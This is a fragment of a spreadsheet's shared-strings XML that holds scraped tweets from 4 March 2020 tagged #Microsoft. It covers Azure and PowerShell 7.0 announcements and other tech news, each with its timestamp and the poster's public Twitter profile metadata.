'https://pbs.twimg.com/profile_banners/724577059159314432/1479130351',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</si>
  <si>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17:37:48 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Announces Date of Sweeping Retirement of MCSA MCSE MCSD Certifications | Global Knowledge https://t.co/cU7yN1XykD #microsoft</t>
  </si>
  <si>
    <t>{'id': 19165165, 'id_str': '19165165', 'name': 'SQL Joker', 'screen_name': 'sql_joker', 'location': '', 'description': 'You should Smile!!! I got all the SQL Tweets! Mu HA HA HA HA! #SQL #SQLServer  #Microsoft #Data\n#SqlServerHelp - tag to help any sql experts on the web', 'url': 'https://t.co/2NZWWB8QN0', 'entities': {'url': {'urls': [{'url': 'https://t.co/2NZWWB8QN0', 'expanded_url': 'https://www.reddit.com/user/sql_joker/', 'display_url': 'reddit.com/user/sql_joker/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3390, 'friends_count': 2865, 'listed_count': 192, 'created_at': 'Mon Jan 19 01:06:29 +0000 2009', 'favourites_count': 265, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 104283,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'http://pbs.twimg.com/profile_images/72577135/sqljoker_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/72577135/sqljoker_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/19165165/1495909174',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</si>
  <si>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17:36:23 +0000 2020</t>
  </si>
  <si>
    <t>Announcing preview of Backup Reports https://t.co/cVzp3PvvQU via @hybrid_ts #Azure #Microsoft https://t.co/vmZ73LyFqI</t>
  </si>
  <si>
    <t>{'id': 962396494228807681, 'id_str': '962396494228807681', 'name': 'HYBRID TECHNOLOGY SYSTEMS', 'screen_name': 'HYBRID_TS', 'location': 'London, England', 'description': '#ITReseller delivering #ITSolutions &amp; #ITConsultancy services. We are #Authorsised #HPE #Cisco #Microsoft #Lenovo resellers - Tel: 0333 600 6090', 'url': 'https://t.co/TBNyttHJct', 'entities': {'url': {'urls': [{'url': 'https://t.co/TBNyttHJct', 'expanded_url': 'http://www.hybridtechnologysystems.com', 'display_url': 'hybridtechnologysystems.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 50, 'friends_count': 34, 'listed_count': 2, 'created_at': 'Sat Feb 10 18:42:59 +0000 2018', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 9473, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1060533621151424512/iMEgV6k1_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1060533621151424512/iMEgV6k1_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/962396494228807681/1541685854',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</si>
  <si>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17:35:13 +0000 2020</t>
  </si>
  <si>
    <t>Show me the lie  
#microsoft https://t.co/RGMtckLUPQ</t>
  </si>
  <si>
    <t>{'id': 23611030, 'id_str': '23611030', 'name': "Christian d'Ippolito", 'screen_name': 'dippo82', 'location': 'Londinium', 'description': 'Advertising, digital media, esports, documentary, 420, calisthenics. Commercial Director at Level99', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 609, 'friends_count': 1253, 'listed_count': 32, 'created_at': 'Tue Mar 10 16:20:11 +0000 2009', 'favourites_count': 3033, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 8594, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '03072D', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/968614375270608898/SKdb8dqO_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/968614375270608898/SKdb8dqO_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/23611030/1519769258', 'profile_link_color': 'A7394D', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '030516', 'profile_text_color': '16818E', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 17:35:08 +0000 2020</t>
  </si>
  <si>
    <t>Announcing preview of Backup Reports https://t.co/7mYGBpwQbZ #Azure #Microsoft</t>
  </si>
  <si>
    <t>{'id': 703096147, 'id_str': '703096147', 'name': 'Victor Silva', 'screen_name': 'vmsilvamolina', 'location': 'Montevideo, Uruguay', 'description': '', 'url': 'https://t.co/3OY725nfKn', 'entities': {'url': {'urls': [{'url': 'https://t.co/3OY725nfKn', 'expanded_url': 'http://blog.victorsilva.com.uy', 'display_url': 'blog.victorsilva.com.uy', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 376, 'friends_count': 610, 'listed_count': 44, 'created_at': 'Wed Jul 18 13:49:29 +0000 2012', 'favourites_count': 1400, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1848,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'http://pbs.twimg.com/profile_images/1003413974501773312/jKIg7X4P_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1003413974501773312/jKIg7X4P_normal.jpg',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</si>
  <si>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17:34:00 +0000 2020</t>
  </si>
  <si>
    <t>Ranked: The Most Valuable Brands in the World https://t.co/WZfHMiRLx4 #brands #value #amazon #microsoft #apple #google and more #infographic https://t.co/BX0J5mwteL</t>
  </si>
  <si>
    <t>{'id': 20060120, 'id_str': '20060120', 'name': 'Selena Maranjian', 'screen_name': 'SelenaMaranjian', 'location': 'Location: At my computer', 'description': 'Woman worrier, financial writer (https://t.co/WUm2pjGlBb), reader, gamer, grape-leaf stuffer, auntie, cat servant. Sharing what amuses or interests me. She/her.', 'url': 'https://t.co/WiKDC2W32W', 'entities': {'url': {'urls': [{'url': 'https://t.co/WiKDC2W32W', 'expanded_url': 'http://www.fool.com/about/staff/SelenaMaranjian/archive.htm', 'display_url': 'fool.com/about/staff/Seâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/WUm2pjGlBb', 'expanded_url': 'http://Fool.com', 'display_url': 'Fool.com', 'indices': [33, 56]}]}}, 'protected': False, 'followers_count': 1940, 'friends_count': 1244, 'listed_count': 844, 'created_at': 'Wed Feb 04 15:18:33 +0000 2009', 'favourites_count': 400, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 83604,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'http://pbs.twimg.com/profile_images/610260946444009472/vjNQk1Iu_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/610260946444009472/vjNQk1Iu_normal.jpg',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</si>
  <si>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17:32:24 +0000 2020</t>
  </si>
  <si>
    <t>Twitter starts testing its own version of Stories, called Fleets, which disappear after 24 hours https://t.co/Xgf1crZFtW #Microsoft</t>
  </si>
  <si>
    <t>Wed Mar 04 17:31:40 +0000 2020</t>
  </si>
  <si>
    <t>Announcing PowerShell 7.0 | PowerShell  https://t.co/bRKeQRpdFX via @joeyaiello #powershell #announcing #microsoft #mvpbuzz</t>
  </si>
  <si>
    <t>{'id': 2227414010, 'id_str': '2227414010', 'name': 'Jan-Henrik Damaschke', 'screen_name': 'JanDamaschke', 'location': 'Hamburg, Germany', 'description': 'Enterprise Security/PowerShell/Azure MVP, CTO @VisorianGmbH, Senior Cloud Architect, Microsoft Certified Trainer and DevSecOps advocate.', 'url': 'https://t.co/yqS8CWWRbh', 'entities': {'url': {'urls': [{'url': 'https://t.co/yqS8CWWRbh', 'expanded_url': 'http://itinsights.org', 'display_url': 'itinsights.org', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 783, 'friends_count': 696, 'listed_count': 30, 'created_at': 'Mon Dec 02 23:25:55 +0000 2013', 'favourites_count': 1001, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1379,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'http://pbs.twimg.com/profile_images/1175789658237743105/RddGLKvm_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1175789658237743105/RddGLKvm_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2227414010/1569165076',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</si>
  <si>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17:30:42 +0000 2020</t>
  </si>
  <si>
    <t>Why does the #SQL server run best on #Microsoft #Azure? And how can you utilize #Azure to innovate your #SQL server workloads? #Microsoft tells us all in this article outlining their performance results based on independent, industry standard benchmarks. https://t.co/rnJzvVL72I</t>
  </si>
  <si>
    <t>{'id': 35262440, 'id_str': '35262440', 'name': 'Optimus Information', 'screen_name': 'optimusinfo', 'location': 'Vancouver &amp; New Delhi', 'description': 'Optimus Information provides outsourced technology services to software companies and IT departments. Contact sales@optimusinfo.com for a consultation.', 'url': 'http://t.co/hDqPVmut22', 'entities': {'url': {'urls': [{'url': 'http://t.co/hDqPVmut22', 'expanded_url': 'http://www.optimusinfo.com/', 'display_url': 'optimusinfo.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 759, 'friends_count': 1161, 'listed_count': 85, 'created_at': 'Sat Apr 25 17:28:48 +0000 2009', 'favourites_count': 425, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4563, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FFFFFF', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme12/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme12/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/689896406866210821/4tlIFemB_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/689896406866210821/4tlIFemB_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/35262440/1453319212', 'profile_link_color': 'EF4135', 'profile_sidebar_border_color': '757474', 'profile_sidebar_fill_color': 'EBEBEB', 'profile_text_color': '757575', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 17:30:41 +0000 2020</t>
  </si>
  <si>
    <t>Technology could help Greek economy grow, Microsoft chief tells Kathimerini https://t.co/cSJO25c5Op via @ekathimerini | #greece #microsoft @Microsoft #technology #ai #culturalheritage</t>
  </si>
  <si>
    <t>{'id': 3731443054, 'id_str': '3731443054', 'name': 'WindyCityGreek', 'screen_name': 'WindyCityGreek', 'location': 'Chicago, IL USA', 'description': '@MariaKaramitsos IS the WindyCity Greek! Come along on her new adventures. | Archives of mag published 2015-2019 at site below. Content/media subject to Â©.', 'url': 'https://t.co/enCascK3Dl', 'entities': {'url': {'urls': [{'url': 'https://t.co/enCascK3Dl', 'expanded_url': 'http://www.mariakaramitsos.com', 'display_url': 'mariakaramitsos.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4047, 'friends_count': 4324, 'listed_count': 96, 'created_at': 'Mon Sep 21 19:48:17 +0000 2015', 'favourites_count': 5371, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 13975,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'http://pbs.twimg.com/profile_images/646067344196829184/waoSqrBx_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/646067344196829184/waoSqrBx_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3731443054/1551649224',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</si>
  <si>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17:30:36 +0000 2020</t>
  </si>
  <si>
    <t>New features in Azure Cosmos DB #Jupyter notebooks are now in preview
- bulk upload data into a container
- integrated nteract data explorer for quick built-in visualization
- new sample notebooks in the gallery
https://t.co/YiEa1l7GhJ
#Azure #Microsoft #Cloud #Database #CosmosDB https://t.co/jz3mWICuTB</t>
  </si>
  <si>
    <t>Wed Mar 04 17:30:06 +0000 2020</t>
  </si>
  <si>
    <t>The team at @incworx has had a lot of conversation about how we can help organizations impacted by Covid-19, the Coronavirus with our experience going remote and as a consulting firm.
To start here is some insight from a #Microsoft team affected early on. https://t.co/mlBqbLnCLz</t>
  </si>
  <si>
    <t>Wed Mar 04 17:29:54 +0000 2020</t>
  </si>
  <si>
    <t>Announcing preview of Backup Reports https://t.co/SP8DYnuk7a #Microsoft #Azure</t>
  </si>
  <si>
    <t>Wed Mar 04 17:29:12 +0000 2020</t>
  </si>
  <si>
    <t>Announcing preview of Backup Reports https://t.co/BcNqNNg2X5 #Microsoft #Azure</t>
  </si>
  <si>
    <t>{'id': 305670778, 'id_str': '305670778', 'name': 'Vishal Pawar,', 'screen_name': 'Vishal_BI', 'location': 'Toronto, Ontario', 'description': 'Principal BI Architect, Green House Data, Power Platform Specialist, Microsoft rMVP', 'url': 'https://t.co/TjgfGfd0Cp', 'entities': {'url': {'urls': [{'url': 'https://t.co/TjgfGfd0Cp', 'expanded_url': 'http://mnts.info/mvpvp', 'display_url': 'mnts.info/mvpvp', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1101, 'friends_count': 1163, 'listed_count': 79, 'created_at': 'Thu May 26 16:13:37 +0000 2011', 'favourites_count': 667, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 7199,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'http://pbs.twimg.com/profile_images/837128412103856129/lOrMlbYa_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/837128412103856129/lOrMlbYa_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/305670778/1500700734', 'profile_link_color': '19CF86',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</si>
  <si>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Wed Mar 04 17:29:05 +0000 2020</t>
  </si>
  <si>
    <t>*** Tip of the Day ***
Do you know that Windows 10 understands finger-friendly touchpad gestures? It is useful for performing repetitive tasks quickly.
Here are some useful touchpad gestures to use every day:  https://t.co/WcGmdXRFL2
#Microsoft #Windows10 #TouchpadGestures https://t.co/Z5NVqBmNNz</t>
  </si>
  <si>
    <t>Wed Mar 04 17:28:25 +0000 2020</t>
  </si>
  <si>
    <t>Announcing preview of Backup Reports  https://t.co/5GjqsDru07  #Azure #Microsoft #Cloud #azureflashnews</t>
  </si>
  <si>
    <t>Wed Mar 04 17:26:24 +0000 2020</t>
  </si>
  <si>
    <t>Update to the Microsoft Authenticator app now rolling out https://t.co/kQY3kh4WiH #AzureAD #Microsoft</t>
  </si>
  <si>
    <t>Wed Mar 04 17:25:49 +0000 2020</t>
  </si>
  <si>
    <t>#Azure New features in Azure Cosmos DB Jupyter notebooks are now in preview https://t.co/s76hhdOcd2 #Microsoft</t>
  </si>
  <si>
    <t>Wed Mar 04 17:25:28 +0000 2020</t>
  </si>
  <si>
    <t>#BusinessTravel Tips for Trainers: Prepack! Have a suitcase and carry-on ready to go with travel essentials. https://t.co/laLJEC103b #TraintheTrainer #microsoft https://t.co/kBash5AOBW</t>
  </si>
  <si>
    <t>Wed Mar 04 17:24:53 +0000 2020</t>
  </si>
  <si>
    <t>Update to the Microsoft Authenticator app now rolling out https://t.co/xogCaTwdEA #Microsoft #IdentityManagement #AccessManagement</t>
  </si>
  <si>
    <t>{'id': 23820117, 'id_str': '23820117', 'name': 'â‚¬ric Vervoordeldonk', 'screen_name': 'vervoordeldonk', 'location': 'Meijel', 'description': 'Global Service Desk Specialist @Nedschroef | @GoGeocaching and hiking', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 101, 'friends_count': 578, 'listed_count': 3, 'created_at': 'Wed Mar 11 20:09:29 +0000 2009', 'favourites_count': 2622, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3524,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'http://pbs.twimg.com/profile_images/1007008114921672705/Wsfjm0Ib_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1007008114921672705/Wsfjm0Ib_normal.jpg', 'profile_link_color': '000000',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</si>
  <si>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Mar 04 17:24:52 +0000 2020</t>
  </si>
  <si>
    <t>#Azure PowerShell 7.0 is now generally available https://t.co/PTmGLiWO9H #Microsoft</t>
  </si>
  <si>
    <t>#Azure Backup Reports is now in preview https://t.co/CAWnZDSWse #Microsoft</t>
  </si>
  <si>
    <t>#Azure Azure FunctionsSupport for custom language workers over HTTP is now in preview https://t.co/HhIP2p7BPh #Microsoft</t>
  </si>
  <si>
    <t>#Azure Virtual machine scale sets now simpler to manage https://t.co/H4zK4LK5Bh #Microsoft</t>
  </si>
  <si>
    <t>#Azure Data Factory adds Flatten transformation, single-row lookups, and updated UI for container activities https://t.co/Q5fKtYgQTK #Microsoft</t>
  </si>
  <si>
    <t>#Azure Updates to Azure HDInsight https://t.co/XDk4l3P5ys #Microsoft</t>
  </si>
  <si>
    <t>#Azure Azure Cosmos DB free tier is now available https://t.co/lhpaGzKstL #Microsoft</t>
  </si>
  <si>
    <t>#Azure Active Directory for authentication on SMB access to Azure File in preview https://t.co/ufWRYM1Se1 #Microsoft</t>
  </si>
  <si>
    <t>Wed Mar 04 17:23:47 +0000 2020</t>
  </si>
  <si>
    <t>#TechNews
Google and Microsoft are giving away enterprise conferencing tools due to coronavirus
Read the full story here:
https://t.co/OcJShMXmHX
Source: https://t.co/4wjrn6nr8o
#theverge #Google #Microsoft #conoravirus #hangouts #GoogleMeet #GSuite #teleconferencing https://t.co/fFD1ZeJwsR</t>
  </si>
  <si>
    <t>{'id': 408085244, 'id_str': '408085244', 'name': 'Jackson Computer Consulting, LLC', 'screen_name': 'JCCHelp', 'location': 'Pittsburgh, PA', 'description': 'Best I.T. services in Pittsburgh at great prices! Here to serve our customers!', 'url': 'http://t.co/zTwo3kOKlV', 'entities': {'url': {'urls': [{'url': 'http://t.co/zTwo3kOKlV', 'expanded_url': 'http://www.JCCHelp.com', 'display_url': 'JCCHelp.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 762, 'friends_count': 1238, 'listed_count': 26, 'created_at': 'Tue Nov 08 23:31:50 +0000 2011', 'favourites_count': 306, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3649, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FFFFFF', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme2/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme2/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1194383561337511943/J4p_NPbE_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1194383561337511943/J4p_NPbE_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/408085244/1442433719', 'profile_link_color': '996600',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</si>
  <si>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Wed Mar 04 17:23:45 +0000 2020</t>
  </si>
  <si>
    <t>Azure Cosmos DB free tier is now available
- 400 RU/s and 5 GB of storage for free for the lifetime of the account
https://t.co/Y9gQpoVDCy
#Azure #Microsoft #Cloud #Database #CosmosDB #Free https://t.co/TbGz5Unxig</t>
  </si>
  <si>
    <t>Another @Microsoft @Office Industry Certified student for @TheSCHSChargers   Please help me congratulate Julie C., for passing her 3rd certification, @msexcel   I'm proud of you, Julie! @Jeff_Eakins @AddisonGDavis @hcpsarea5 @raburn4 @HCPSCTAE @CrestYbk #Microsoft https://t.co/SSAVgNuKRb</t>
  </si>
  <si>
    <t>Wed Mar 04 17:22:53 +0000 2020</t>
  </si>
  <si>
    <t>#Azure Announcing preview of Backup Reports https://t.co/ohUkEo7XXS #Microsoft</t>
  </si>
  <si>
    <t>Wed Mar 04 17:22:38 +0000 2020</t>
  </si>
  <si>
    <t>The #Microsoft Puget Sound campus consists of 120 buildings and 15 million square feet of office space. Operating that much infrastructure is a huge undertaking and requires serious IT solutions. How are you managing your operations? https://t.co/uahEZdJE6M</t>
  </si>
  <si>
    <t>Wed Mar 04 17:21:22 +0000 2020</t>
  </si>
  <si>
    <t>Only you can prevent boat fires. 
#rhino #rhinoceros #rhinogame #rhinogaming #rhinoplays #minecraft #survival #play #playoffs #microsoft #xbox #playstation #hash #hashtag #dankmemes #gamingmemes #perfectlycutscreams #perfection #youtuber #redstone https://t.co/OlcNl1U38V</t>
  </si>
  <si>
    <t>{'id': 1010007705204019200, 'id_str': '1010007705204019200', 'name': 'Rhinogaming', 'screen_name': 'Rhinogaming15', 'location': 'Iowa, USA', 'description': '21 Also Rhinogaming on YouTube  Youtuber  Lifter  That bearded guy you occasionally see posting on here  Subscribe to the official Rhinogaming channelðŸ‘‡ðŸ»ðŸ‘‡ðŸ»', 'url': 'https://t.co/PQR4G4yJRI', 'entities': {'url': {'urls': [{'url': 'https://t.co/PQR4G4yJRI', 'expanded_url': 'https://m.youtube.com/channel/UCmMSisYk_M9X0PA2wIQ2PIw/videos', 'display_url': 'm.youtube.com/channel/UCmMSiâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 25, 'friends_count': 46, 'listed_count': 0, 'created_at': 'Fri Jun 22 03:52:56 +0000 2018', 'favourites_count': 21, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 304, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1187076405944901632/LZG97kyR_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1187076405944901632/LZG97kyR_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1010007705204019200/1552272956',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</si>
  <si>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17:21:16 +0000 2020</t>
  </si>
  <si>
    <t>Great work @PowerShell_Team on the release of @azureposh PowerShell 7.0 is now generally available
- Pipeline parallelization
- New operators
- A simplified and dynamic error view
- Automatic new version notifications
https://t.co/v90bUuyfmO
#Azure #Microsoft #Cloud #PowerShell https://t.co/9JwhzTHAwv</t>
  </si>
  <si>
    <t>Wed Mar 04 17:21:08 +0000 2020</t>
  </si>
  <si>
    <t>Announcing preview of Backup Reports https://t.co/dQKio1Utr0  #Cloud #CloudComputing #Azure #Microsoft via Azure</t>
  </si>
  <si>
    <t>{'id': 14314862, 'id_str': '14314862', 'name': 'Shane Brighton', 'screen_name': 'shanebrighton', 'location': 'London, England', 'description': 'Helping customers to leverage information and technology for business advantage.', 'url': 'https://t.co/zLuA3rqX47', 'entities': {'url': {'urls': [{'url': 'https://t.co/zLuA3rqX47', 'expanded_url': 'http://linkedin.com/in/shanebrighton', 'display_url': 'linkedin.com/in/shanebrightâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 8036, 'friends_count': 3484, 'listed_count': 103, 'created_at': 'Sun Apr 06 11:08:56 +0000 2008', 'favourites_count': 3289, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 52017,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'http://pbs.twimg.com/profile_images/1100770585557286912/Oz7w9LUf_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1100770585557286912/Oz7w9LUf_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14314862/1499344694',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</si>
  <si>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17:20:46 +0000 2020</t>
  </si>
  <si>
    <t>Find out how #Microsoft certifications give your business a competitive advantage while strengthening your IT staff, improving operations, and increasing ROI on your software purchases. Download your copy now. https://t.co/j6HFhw4AcI #Ebook</t>
  </si>
  <si>
    <t>{'id': 43946677, 'id_str': '43946677', 'name': 'Pat Whooley', 'screen_name': 'PatWhooley', 'location': 'Boston, Massachusetts', 'description': 'Account Executive, New Horizons Computer Learning', 'url': 'https://t.co/1aAgD1vnKs', 'entities': {'url': {'urls': [{'url': 'https://t.co/1aAgD1vnKs', 'expanded_url': 'http://www.nhls.com', 'display_url': 'nhls.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 71, 'friends_count': 114, 'listed_count': 38, 'created_at': 'Mon Jun 01 19:05:06 +0000 2009', 'favourites_count': 6, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1204,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'http://pbs.twimg.com/profile_images/2517910183/4o6e60b71z8ubiatc3y5_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2517910183/4o6e60b71z8ubiatc3y5_normal.jpeg',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</si>
  <si>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17:20:00 +0000 2020</t>
  </si>
  <si>
    <t>Power Automate UI Flows February 2020 update is now available - #MicrosoftFlow #Microsoft  #InsightRun - https://t.co/hMSZVdyfc1</t>
  </si>
  <si>
    <t>Wed Mar 04 17:18:43 +0000 2020</t>
  </si>
  <si>
    <t>A reminder of the open job roles in our #Microsoft #Azure #HPC &amp;amp; #AI team:
https://t.co/4b3cPC91p6
https://t.co/FmXHFzc35N
https://t.co/ef6kh2AQye
#cloud</t>
  </si>
  <si>
    <t>Wed Mar 04 17:18:23 +0000 2020</t>
  </si>
  <si>
    <t>Release the beast, I love it! 
 #wedding #microsoft https://t.co/XJgNMI6rsK</t>
  </si>
  <si>
    <t>{'id': 1235010934382485510, 'id_str': '1235010934382485510', 'name': 'Sheila Miller', 'screen_name': 'rytcheamarturn', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 32, 'listed_count': 0, 'created_at': 'Wed Mar 04 01:15:32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'http://pbs.twimg.com/profile_images/1235011910690623491/-jvV44bc_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235011910690623491/-jvV44bc_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235010934382485510/1583284823',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</si>
  <si>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17:18:01 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> #Azure Updates: New features in Azure Cosmos DB Jupyter notebooks are now in preview
#Microsoft #MicrosoftAzure #ITSpecialistPro
https://t.co/oi6CuOlixn</t>
  </si>
  <si>
    <t>Wed Mar 04 17:18:00 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> #Azure Updates: Azure DevTest LabsSecurity alerts for lab environments
#Microsoft #MicrosoftAzure #ITSpecialistPro
https://t.co/DKnHp5KGtz</t>
  </si>
  <si>
    <t xml:space="preserve"> #Azure Updates: Data Factory adds Flatten transformation, single-row lookups, and updated UI for container activities
#Microsoft #MicrosoftAzure #ITSpecialistPro
https://t.co/blr4LNSJww</t>
  </si>
  <si>
    <t xml:space="preserve"> #Azure Updates: Updates to Azure HDInsight
#Microsoft #MicrosoftAzure #ITSpecialistPro
https://t.co/DGY25eJR7l</t>
  </si>
  <si>
    <t xml:space="preserve"> #Azure Updates: PowerShell 7.0 is now generally available
#Microsoft #MicrosoftAzure #ITSpecialistPro
https://t.co/LtaGBHlZOJ</t>
  </si>
  <si>
    <t xml:space="preserve"> #Azure Updates: Azure FunctionsSupport for custom language workers over HTTP is now in preview
#Microsoft #MicrosoftAzure #ITSpecialistPro
https://t.co/20ozeVpmTI</t>
  </si>
  <si>
    <t xml:space="preserve"> #Azure Updates: Virtual machine scale sets now simpler to manage
#Microsoft #MicrosoftAzure #ITSpecialistPro
https://t.co/5PIMRmq0aZ</t>
  </si>
  <si>
    <t xml:space="preserve"> #Azure Updates: Backup Reports is now in preview
#Microsoft #MicrosoftAzure #ITSpecialistPro
https://t.co/8VUATSosjr</t>
  </si>
  <si>
    <t xml:space="preserve"> #Azure Updates: Active Directory for authentication on SMB access to Azure File in preview
#Microsoft #MicrosoftAzure #ITSpecialistPro
https://t.co/laxLmDafH5</t>
  </si>
  <si>
    <t xml:space="preserve"> #Azure Updates: Azure Cosmos DB free tier is now available
#Microsoft #MicrosoftAzure #ITSpecialistPro
https://t.co/wKU5lgBiJT</t>
  </si>
  <si>
    <t>Wed Mar 04 17:17:01 +0000 2020</t>
  </si>
  <si>
    <t>Virtual machine scale sets now simpler to manage
- NEW custom scale-in policies
- NEW instance protection policies
https://t.co/U8EVsvYLvV
#Azure #Microsoft #Cloud #Compute #ScaleSet #Management https://t.co/XAKunaRtsg</t>
  </si>
  <si>
    <t>Wed Mar 04 17:16:57 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft teases new Windows 10 Start menu that de-emphasizes Live Tiles https://t.co/C6OKzljKRK #microsoft</t>
  </si>
  <si>
    <t>{'id': 736969022856536064, 'id_str': '736969022856536064', 'name': 'All About Technology', 'screen_name': 'FixingIT_InTheD', 'location': 'Detroit, MI', 'description': 'Certified #MBE provides customers with #tech #solutions and pursuing our #passion to make #sustainable #technology #accessible and #affordable for all. #Detroit', 'url': 'https://t.co/l7qi1DnB1z', 'entities': {'url': {'urls': [{'url': 'https://t.co/l7qi1DnB1z', 'expanded_url': 'http://www.all-about-technology.com', 'display_url': 'all-about-technology.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 145, 'friends_count': 95, 'listed_count': 40, 'created_at': 'Sun May 29 17:14:42 +0000 2016', 'favourites_count': 101, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5111, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/737027818199080961/JUm1bvYQ_normal.jpg', 'profile_image_url_https': 